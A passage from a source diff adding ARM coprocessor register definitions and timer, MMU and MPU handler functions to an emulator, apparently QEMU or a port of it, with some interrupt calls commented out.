NULL, NULL, vbar_write, }, + { "SCR", 15,1,1, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.scr_el3), + NULL, NULL, scr_write }, + { "CCSIDR", 0,0,0, 3,1,0, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, 0, + NULL, ccsidr_read, }, + { "CSSELR", 0,0,0, 3,2,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c0_cssel), + NULL, NULL, csselr_write, }, + /* Auxiliary ID register: this actually has an IMPDEF value but for now + * just RAZ for all cores: + */ + { "AIDR", 0,0,0, 3,1,7, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, 0 }, + /* Auxiliary fault status registers: these also are IMPDEF, and we + * choose to RAZ/WI for all cores. + */ + { "AFSR0_EL1", 0,5,1, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "AFSR1_EL1", 0,5,1, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + /* MAIR can just read-as-written because we don't implement caches + * and so don't need to care about memory attributes. + */ + { "MAIR_EL1", 0,10,2, 3,0,0, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.mair_el1), }, + /* For non-long-descriptor page tables these are PRRR and NMRR; + * regardless they still act as reads-as-written for QEMU. + * The override is necessary because of the overly-broad TLB_LOCKDOWN + * definition. + */ + { "MAIR0", 15,10,2, 0,0,0, ARM_CP_STATE_AA32, + ARM_CP_OVERRIDE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.mair_el1), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "MAIR1", 15,10,2, 0,0,1, ARM_CP_STATE_AA32, + ARM_CP_OVERRIDE, PL1_RW, NULL, 0, offsetofhigh32(CPUARMState, cp15.mair_el1), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "ISR_EL1", 0,12,1, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, 0, + NULL, isr_read }, + /* 32 bit ITLB invalidates */ + { "ITLBIALL", 15,8,5, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "ITLBIMVA", 15,8,5, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "ITLBIASID", 15,8,5, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write }, + /* 32 bit DTLB invalidates */ + { "DTLBIALL", 15,8,6, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "DTLBIMVA", 15,8,6, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "DTLBIASID", 15,8,6, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write }, + /* 32 bit TLB invalidates */ + { "TLBIALL", 15,8,7, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "TLBIMVA", 15,8,7, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "TLBIASID", 15,8,7, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write }, + { "TLBIMVAA", 15,8,7, 0,0,3, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_write }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo v7mp_cp_reginfo[] = { + /* 32 bit TLB invalidates, Inner Shareable */ + { "TLBIALLIS", 15,8,3, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_is_write }, + { "TLBIMVAIS", 15,8,3, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_is_write }, + { "TLBIASIDIS", 15,8,3, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_is_write }, + { "TLBIMVAAIS", 15,8,3, 0,0,3, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_is_write }, + REGINFO_SENTINEL +}; + +static void teecr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= 1; + env->teecr = value; +} + +static CPAccessResult teehbr_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (arm_current_el(env) == 0 && (env->teecr & 1)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static const ARMCPRegInfo t2ee_cp_reginfo[] = { + { "TEECR", 14,0,0, 0,6,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, teecr), + NULL, NULL, teecr_write }, + { "TEEHBR", 14,1,0, 0,6,0, 0, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, teehbr), + teehbr_access, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo v6k_cp_reginfo[] = { + { "TPIDR_EL0", 0,13,0, 3,3,2, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.tpidr_el0), }, + { "TPIDRURW", 15,13,0, 0,0,2, 0, + 0, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.tpidr_el0), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "TPIDRRO_EL0", 0,13,0, 3,3,3, ARM_CP_STATE_AA64, + 0, PL0_R|PL1_W, NULL, 0, offsetof(CPUARMState, cp15.tpidrro_el0) }, + { "TPIDRURO", 15,13,0, 0,0,3, 0, + 0, PL0_R|PL1_W, NULL, 0, offsetoflow32(CPUARMState, cp15.tpidrro_el0), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "TPIDR_EL1", 0,13,0, 3,0,4, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.tpidr_el1), }, + REGINFO_SENTINEL +}; + +#ifndef CONFIG_USER_ONLY + +static CPAccessResult gt_cntfrq_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* CNTFRQ: not visible from PL0 if both PL0PCTEN and PL0VCTEN are zero */ + if (arm_current_el(env) == 0 && !extract32(env->cp15.c14_cntkctl, 0, 2)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static CPAccessResult gt_counter_access(CPUARMState *env, int timeridx) +{ + /* CNT[PV]CT: not visible from PL0 if ELO[PV]CTEN is zero */ + if (arm_current_el(env) == 0 && + !extract32(env->cp15.c14_cntkctl, timeridx, 1)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static CPAccessResult gt_timer_access(CPUARMState *env, int timeridx) +{ + /* CNT[PV]_CVAL, CNT[PV]_CTL, CNT[PV]_TVAL: not visible from PL0 if + * EL0[PV]TEN is zero. + */ + if (arm_current_el(env) == 0 && + !extract32(env->cp15.c14_cntkctl, 9 - timeridx, 1)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static CPAccessResult gt_pct_access(CPUARMState *env, + const ARMCPRegInfo *ri) +{ + return gt_counter_access(env, GTIMER_PHYS); +} + +static CPAccessResult gt_vct_access(CPUARMState *env, + const ARMCPRegInfo *ri) +{ + return gt_counter_access(env, GTIMER_VIRT); +} + +static CPAccessResult gt_ptimer_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return gt_timer_access(env, GTIMER_PHYS); +} + +static CPAccessResult gt_vtimer_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return gt_timer_access(env, GTIMER_VIRT); +} + +static uint64_t gt_get_countervalue(CPUARMState *env) +{ + return qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / GTIMER_SCALE; +} + +static void gt_recalc_timer(ARMCPU *cpu, int timeridx) +{ + ARMGenericTimer *gt = &cpu->env.cp15.c14_timer[timeridx]; + + if (gt->ctl & 1) { + /* Timer enabled: calculate and set current ISTATUS, irq, and + * reset timer to when ISTATUS next has to change + */ + uint64_t count = gt_get_countervalue(&cpu->env); + /* Note that this must be unsigned 64 bit arithmetic: */ + int istatus = count >= gt->cval; + uint64_t nexttick; + + gt->ctl = deposit32(gt->ctl, 2, 1, istatus); + //qemu_set_irq(cpu->gt_timer_outputs[timeridx], + // (istatus && !(gt->ctl & 2))); + if (istatus) { + /* Next transition is when count rolls back over to zero */ + nexttick = UINT64_MAX; + } else { + /* Next transition is when we hit cval */ + nexttick = gt->cval; + } + /* Note that the desired next expiry time might be beyond the + * signed-64-bit range of a QEMUTimer -- in this case we just + * set the timer for as far in the future as possible. When the + * timer expires we will reset the timer for any remaining period. + */ + if (nexttick > INT64_MAX / GTIMER_SCALE) { + nexttick = INT64_MAX / GTIMER_SCALE; + } + //timer_mod(cpu->gt_timer[timeridx], nexttick); + } else { + /* Timer disabled: ISTATUS and timer output always clear */ + gt->ctl &= ~4; + //qemu_set_irq(cpu->gt_timer_outputs[timeridx], 0); + //timer_del(cpu->gt_timer[timeridx]); + } +} + +static void gt_cnt_reset(CPUARMState *env, const ARMCPRegInfo *ri) +{ +} + +static uint64_t gt_cnt_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return gt_get_countervalue(env); +} + +static void gt_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + int timeridx = ri->opc1 & 1; + + env->cp15.c14_timer[timeridx].cval = value; + //gt_recalc_timer(arm_env_get_cpu(env), timeridx); +} + +static uint64_t gt_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + int timeridx = ri->crm & 1; + + return (uint32_t)(env->cp15.c14_timer[timeridx].cval - + gt_get_countervalue(env)); +} + +static void gt_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + int timeridx = ri->crm & 1; + + env->cp15.c14_timer[timeridx].cval = gt_get_countervalue(env) + + + sextract64(value, 0, 32); + gt_recalc_timer(arm_env_get_cpu(env), timeridx); +} + +static void gt_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int timeridx = ri->crm & 1; + uint32_t oldval = env->cp15.c14_timer[timeridx].ctl; + + env->cp15.c14_timer[timeridx].ctl = deposit64(oldval, 0, 2, value); + if ((oldval ^ value) & 1) { + /* Enable toggled */ + gt_recalc_timer(cpu, timeridx); + } else if ((oldval ^ value) & 2) { + /* IMASK toggled: don't need to recalculate, + * just set the interrupt line based on ISTATUS + */ + //qemu_set_irq(cpu->gt_timer_outputs[timeridx], + // (oldval & 4) && !(value & 2)); + } +} + +void arm_gt_ptimer_cb(void *opaque) +{ + ARMCPU *cpu = opaque; + + gt_recalc_timer(cpu, GTIMER_PHYS); +} + +void arm_gt_vtimer_cb(void *opaque) +{ + ARMCPU *cpu = opaque; + + gt_recalc_timer(cpu, GTIMER_VIRT); +} + +static const ARMCPRegInfo generic_timer_cp_reginfo[] = { + /* Note that CNTFRQ is purely reads-as-written for the benefit + * of software; writing it doesn't actually change the timer frequency. + * Our reset value matches the fixed frequency we implement the timer at. + */ + { "CNTFRQ", 15,14,0, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetoflow32(CPUARMState, cp15.c14_cntfrq), + gt_cntfrq_access, NULL,NULL, NULL,NULL, arm_cp_reset_ignore, }, + { "CNTFRQ_EL0", 0,14,0, 3,3,0, ARM_CP_STATE_AA64, + 0, PL1_RW | PL0_R, NULL, (1000 * 1000 * 1000) / GTIMER_SCALE, offsetof(CPUARMState, cp15.c14_cntfrq), + gt_cntfrq_access, }, + /* overall control: mostly access permissions */ + { "CNTKCTL", 0,14,1, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c14_cntkctl), }, + /* per-timer control */ + { "CNTP_CTL", 15,14,2, 0,0,1, 0, + ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), + gt_ptimer_access, NULL, gt_ctl_write, NULL,raw_write, arm_cp_reset_ignore, }, + { "CNTP_CTL_EL0", 0,14,2, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), + gt_ptimer_access, NULL,gt_ctl_write, NULL,raw_write, }, + { "CNTV_CTL", 15,14,3, 0,0,1, 0, + ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), + gt_vtimer_access, NULL,gt_ctl_write, NULL,raw_write, arm_cp_reset_ignore, }, + { "CNTV_CTL_EL0", 0,14,3, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), + gt_vtimer_access, NULL,gt_ctl_write, NULL,raw_write, }, + /* TimerValue views: a 32 bit downcounting view of the underlying state */ + { "CNTP_TVAL", 15,14,2, 0,0,0, 0, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + gt_ptimer_access, gt_tval_read, gt_tval_write, }, + { "CNTP_TVAL_EL0", 0,14,2, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + NULL, gt_tval_read, gt_tval_write, }, + { "CNTV_TVAL", 15,14,3, 0,0,0, 0, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + gt_vtimer_access, gt_tval_read, gt_tval_write, }, + { "CNTV_TVAL_EL0", 0,14,3, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + NULL, gt_tval_read, gt_tval_write, }, + /* The counter itself */ + { "CNTPCT", 15,0,14, 0,0, 0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_pct_access, gt_cnt_read,NULL, NULL,NULL, arm_cp_reset_ignore, }, + { "CNTPCT_EL0", 0,14,0, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_pct_access, gt_cnt_read, NULL, NULL, NULL, gt_cnt_reset, }, + { "CNTVCT", 15,0,14, 0,1,0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_vct_access, gt_cnt_read,NULL, NULL,NULL, arm_cp_reset_ignore, }, + { "CNTVCT_EL0", 0,14,0, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_vct_access, gt_cnt_read, NULL, NULL,NULL, gt_cnt_reset, }, + /* Comparison value, indicating when the timer goes off */ + { "CNTP_CVAL", 15, 0,14, 0,2, 0, 0, + ARM_CP_64BIT | ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), + gt_ptimer_access, NULL, gt_cval_write, NULL, raw_write, arm_cp_reset_ignore, }, + { "CNTP_CVAL_EL0", 0,14,2, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), + gt_vtimer_access, NULL, gt_cval_write, NULL, raw_write, }, + { "CNTV_CVAL", 15, 0,14, 0,3,0, 0, + ARM_CP_64BIT | ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), + gt_vtimer_access, NULL, gt_cval_write, NULL, raw_write, arm_cp_reset_ignore, }, + { "CNTV_CVAL_EL0", 0,14,3, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), + gt_vtimer_access, NULL, gt_cval_write, NULL, raw_write, }, + REGINFO_SENTINEL +}; + +#else +/* In user-mode none of the generic timer registers are accessible, + * and their implementation depends on QEMU_CLOCK_VIRTUAL and qdev gpio outputs, + * so instead just don't register any of them. + */ +static const ARMCPRegInfo generic_timer_cp_reginfo[] = { + REGINFO_SENTINEL +}; + +#endif + +static void par_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + if (arm_feature(env, ARM_FEATURE_LPAE)) { + raw_write(env, ri, value); + } else if (arm_feature(env, ARM_FEATURE_V7)) { + raw_write(env, ri, value & 0xfffff6ff); + } else { + raw_write(env, ri, value & 0xfffff1ff); + } +} + +#ifndef CONFIG_USER_ONLY +/* get_phys_addr() isn't present for user-mode-only targets */ + +static CPAccessResult ats_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (ri->opc2 & 4) { + /* Other states are only available with TrustZone; in + * a non-TZ implementation these registers don't exist + * at all, which is an Uncategorized trap. This underdecoding + * is safe because the reginfo is NO_MIGRATE. + */ + return CP_ACCESS_TRAP_UNCATEGORIZED; + } + return CP_ACCESS_OK; +} + +static void ats_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + hwaddr phys_addr; + target_ulong page_size; + int prot; + int ret, is_user = ri->opc2 & 2; + int access_type = ri->opc2 & 1; + + ret = get_phys_addr(env, value, access_type, is_user, + &phys_addr, &prot, &page_size); + if (extended_addresses_enabled(env)) { + /* ret is a DFSR/IFSR value for the long descriptor + * translation table format, but with WnR always clear. + * Convert it to a 64-bit PAR. + */ + uint64_t par64 = (1 << 11); /* LPAE bit always set */ + if (ret == 0) { + par64 |= phys_addr & ~0xfffULL; + /* We don't set the ATTR or SH fields in the PAR. */ + } else { + par64 |= 1; /* F */ + par64 |= (ret & 0x3f) << 1; /* FS */ + /* Note that S2WLK and FSTAGE are always zero, because we don't + * implement virtualization and therefore there can't be a stage 2 + * fault. + */ + } + env->cp15.par_el1 = par64; + } else { + /* ret is a DFSR/IFSR value for the short descriptor + * translation table format (with WnR always clear). + * Convert it to a 32-bit PAR. + */ + if (ret == 0) { + /* We do not set any attribute bits in the PAR */ + if (page_size == (1 << 24) + && arm_feature(env, ARM_FEATURE_V7)) { + env->cp15.par_el1 = (phys_addr & 0xff000000) | 1 << 1; + } else { + env->cp15.par_el1 = phys_addr & 0xfffff000; + } + } else { + env->cp15.par_el1 = ((ret & (1 << 10)) >> 5) | + ((ret & (1 << 12)) >> 6) | + ((ret & 0xf) << 1) | 1; + } + } +} +#endif + +static const ARMCPRegInfo vapa_cp_reginfo[] = { + { "PAR", 15,7,4, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.par_el1), + NULL, NULL, par_write }, +#ifndef CONFIG_USER_ONLY + { "ATS", 15,7,8, 0,0,CP_ANY, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + ats_access, NULL, ats_write }, +#endif + REGINFO_SENTINEL +}; + +/* Return basic MPU access permission bits. */ +static uint32_t simple_mpu_ap_bits(uint32_t val) +{ + uint32_t ret; + uint32_t mask; + int i; + ret = 0; + mask = 3; + for (i = 0; i < 16; i += 2) { + ret |= (val >> i) & mask; + mask <<= 2; + } + return ret; +} + +/* Pad basic MPU access permission bits to extended format. */ +static uint32_t extended_mpu_ap_bits(uint32_t val) +{ + uint32_t ret; + uint32_t mask; + int i; + ret = 0; + mask = 3; + for (i = 0; i < 16; i += 2) { + ret |= (val & mask) << i; + mask <<= 2; + } + return ret; +} + +static void pmsav5_data_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.pmsav5_data_ap = extended_mpu_ap_bits(value); +} + +static uint64_t pmsav5_data_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return simple_mpu_ap_bits(env->cp15.pmsav5_data_ap); +} + +static void pmsav5_insn_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.pmsav5_insn_ap = extended_mpu_ap_bits(value); +} + +static uint64_t pmsav5_insn_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return simple_mpu_ap_bits(env->cp15.pmsav5_insn_ap); +} + +static const ARMCPRegInfo pmsav5_cp_reginfo[] = { + { "DATA_AP", 15,5,0, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_data_ap), + NULL, pmsav5_data_ap_read, pmsav5_data_ap_write, }, + { "INSN_AP", 15,5,0, 0,0,1, 0, + ARM_CP_NO_MIGRATE,PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_insn_ap), + NULL, pmsav5_insn_ap_read, pmsav5_insn_ap_write, }, + { "DATA_EXT_AP", 15,5,0, 0,0,2, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_data_ap), }, + { "INSN_EXT_AP", 15,5,0, 0,0,3, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_insn_ap), }, + { "DCACHE_CFG", 15,2,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c2_data), }, + { "ICACHE_CFG", 15,2,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c2_insn), }, + /* Protection region base and size registers */ + { "946_PRBS0", 15,6,0, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[0]) }, + { "946_PRBS1", 15,6,1, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[1]) }, + { "946_PRBS2", 15,6,2, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[2]) }, + { "946_PRBS3", 15,6,3, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[3]) }, + { "946_PRBS4", 15,6,4, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[4]) }, + { "946_PRBS5", 15,6,5, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[5]) }, + { "946_PRBS6", 15,6,6, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[6]) }, + { "946_PRBS7", 15,6,7, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[7]) }, + REGINFO_SENTINEL +}; + +static void vmsa_ttbcr_raw_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + int maskshift = extract32(value, 0, 3); + + if (!arm_feature(env, ARM_FEATURE_V8)) { + if (arm_feature(env, ARM_FEATURE_LPAE) && (value & TTBCR_EAE)) { + /* Pre ARMv8 bits [21:19], [15:14] and [6:3] are UNK/SBZP when + * using Long-desciptor translation table format */ + value &= ~((7 << 19) | (3 << 14) | (0xf << 3)); + } else if (arm_feature(env, ARM_FEATURE_EL3)) { + /* In an implementation that includes the Security Extensions + * TTBCR has additional fields PD0 [4] and PD1 [5] for + * Short-descriptor translation table format. + */ + value &= TTBCR_PD1 | TTBCR_PD0 | TTBCR_N; + } else { + value &= TTBCR_N; + } + } + + /* Note that we always calculate c2_mask and c2_base_mask, but + * they are only used for short-descriptor tables (ie if EAE is 0); + * for long-descriptor tables the TTBCR fields are used differently + * and the c2_mask and c2_base_mask values are meaningless. + */ + raw_write(env, ri, value); + env->cp15.c2_mask = ~(((uint32_t)0xffffffffu) >> maskshift); + env->cp15.c2_base_mask = ~((uint32_t)0x3fffu >> maskshift); +} + +static void vmsa_ttbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (arm_feature(env, ARM_FEATURE_LPAE)) { + /* With LPAE the TTBCR could result in a change of ASID + * via the TTBCR.A1 bit, so do a TLB flush. + */ + tlb_flush(CPU(cpu), 1); + } + vmsa_ttbcr_raw_write(env, ri, value); +} + +static void vmsa_ttbcr_reset(CPUARMState *env, const ARMCPRegInfo *ri) +{ + env->cp15.c2_base_mask = 0xffffc000u; + raw_write(env, ri, 0); + env->cp15.c2_mask = 0; +} + +static void vmsa_tcr_el1_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + /* For AArch64 the A1 bit could result in a change of ASID, so TLB flush. */ + tlb_flush(CPU(cpu), 1); + raw_write(env, ri, value); +} + +static void vmsa_ttbr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* 64 bit accesses to the TTBRs can change the ASID and so we + * must flush the TLB. + */ + if (cpreg_field_is_64bit(ri)) { + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush(CPU(cpu), 1); + } + raw_write(env, ri, value); +} + +static const ARMCPRegInfo vmsa_cp_reginfo[] = { + { "DFSR", 15,5,0, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.esr_el[1]), + NULL,NULL,NULL,NULL,NULL, arm_cp_reset_ignore, }, + { "IFSR", 15,5,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ifsr_el2), }, + { "ESR_EL1", 0,5,2, 3,0,0, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.esr_el[1]), }, + { "TTBR0_EL1", 0,2,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr0_el1), + NULL, NULL, vmsa_ttbr_write, }, + { "TTBR1_EL1", 0,2,0, 3,0,1, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr1_el1), + NULL, NULL, vmsa_ttbr_write, }, + { "TCR_EL1", 0,2,0, 3,0,2, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c2_control), + NULL, NULL,vmsa_tcr_el1_write, NULL,raw_write, vmsa_ttbcr_reset, }, + { "TTBCR", 15,2,0, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c2_control), + NULL, NULL, vmsa_ttbcr_write, NULL, vmsa_ttbcr_raw_write, arm_cp_reset_ignore, }, + /* 64-bit FAR; this entry also gives us the AArch32 DFAR */ + { "FAR_EL1", 0,6,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.far_el[1]), }, + REGINFO_SENTINEL +}; + +static void omap_ticonfig_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c15_ticonfig = value & 0xe7; + /* The OS_TYPE bit in this register changes the reported CPUID! */ + env->cp15.c0_cpuid = (value & (1 << 5)) ? + ARM_CPUID_TI915T : ARM_CPUID_TI925T; +} + +static void omap_threadid_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c15_threadid = value & 0xffff; +} + +static void omap_wfi_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Wait-for-interrupt (deprecated) */ + cpu_interrupt(CPU(arm_env_get_cpu(env)), CPU_INTERRUPT_HALT); +} + +static void omap_cachemaint_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* On OMAP there are registers indicating the max/min index of dcache lines + * containing a dirty line; cache flush operations have to reset these. + */ + env->cp15.c15_i_max = 0x000; + env->cp15.c15_i_min = 0xff0; +} + +static const ARMCPRegInfo omap_cp_reginfo[] = { + { "DFSR", 15,5,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_OVERRIDE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.esr_el[1]), }, + { "", 15,15,0, 0,0,0, 0, + ARM_CP_NOP, PL1_RW, NULL, 0, 0, }, + { "TICONFIG", 15,15,1, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_ticonfig), + NULL, NULL, omap_ticonfig_write }, + { "IMAX", 15,15,2, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_i_max), }, + { "IMIN", 15,15,3, 0,0,0, 0, + 0, PL1_RW, NULL, 0xff0, offsetof(CPUARMState, cp15.c15_i_min) }, + { "THREADID", 15,15,4, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_threadid), + NULL, NULL, 